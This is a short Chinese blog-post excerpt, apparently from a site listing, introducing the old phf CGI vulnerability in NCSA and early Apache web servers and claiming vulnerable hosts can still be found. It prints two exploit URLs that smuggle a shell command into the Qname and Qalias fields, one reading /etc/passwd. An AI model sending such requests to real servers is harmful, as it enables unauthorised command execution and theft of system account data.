专注于互联网--专注于架构

最新标签
网站地图
文章索引
Rss订阅
不知道大家有没有听说过个著名漏洞:phf   漏洞描述: 在NCSA 或者 Apache (1.1.1版本以内)非商业版本Web Server中有段util.c,允许黑客以root身份执行任何个指令   http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here   http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd   这是 4年前漏洞了我们现在还能找到他吗?   答案是:   当然可以!:)   http://www. [阅读全文] [PDF]
1 共1条 分1页